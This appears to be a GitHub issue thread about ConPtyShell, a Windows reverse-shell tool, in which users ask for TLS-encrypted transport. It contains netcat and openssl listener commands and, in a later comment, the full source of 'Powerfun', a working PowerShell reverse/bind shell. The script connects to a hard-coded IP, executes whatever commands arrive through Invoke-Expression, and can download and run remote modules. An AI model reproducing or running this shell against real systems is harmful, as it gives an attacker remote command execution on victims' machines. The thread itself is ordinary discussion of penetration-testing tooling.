ConPtyShell
ConPtyShell copied to clipboard
antonioCoco
New Feature: Secure Transport
Would it be possible to use TLS? Instead of stty raw -echo; (stty size; cat) | nc -lvnp 3001 use stty raw -echo; (stty size; cat) | openssl s_server -quiet -key key.pem -cert cert.pem -port 3001 on the other side. (You will have to generate a key and a certificate beforehand with openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes once.)
I am working on a script, that can catch reverse shells from Linux (plaintext and openssl) and upgrade them automatically. I want to extend it to Windows and found this very nice shell. For nc this should be easy for me to adapt. But secure transport would require ConPtyShell to use a TLS connection. Can you implement this?
it would be a nice feature to add as an optional argument.
It should be possible to do with something like in this example https://docs.microsoft.com/en-us/dotnet/api/system.net.security.sslstream?view=netframework-2.0
I will add it in a future release. If you would like to try, PR are welcome :D
Thank you for your response. I will have a look into it. If I find a way to implement this, I will send a PR. 🙂
Actually the ncat support --ssl switch, so no need of generating ssl certs beforehand.
Also I have this non-interactive powershell reverse shell stashed from here, which uses encrypted channel:
# Powerfun - Written by Ben Turner & Dave Hardy
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
}
function powerfun
{
Param(
[String]$Command,
[String]$Sslcon,
[String]$Download
)
Process {
$modules = @()
if ($Command -eq "bind")
{
$listener = [System.Net.Sockets.TcpListener]4444
$listener.start()
$client = $listener.AcceptTcpClient()
}
if ($Command -eq "reverse")
{
$client = New-Object System.Net.Sockets.TCPClient("192.168.119.126",4444)
}
$stream = $client.GetStream()
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient("192.168.119.126", $null, "Tls12", $false)
$stream = $sslStream
}
[byte[]]$bytes = 0..20000|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
if ($Download -eq "true")
{
$sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
ForEach ($module in $modules)
{
(Get-Webclient).DownloadString($module)|Invoke-Expression
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
$listener.Stop()
}
}
The question is if this approach could be implemented with interactive shell ?!
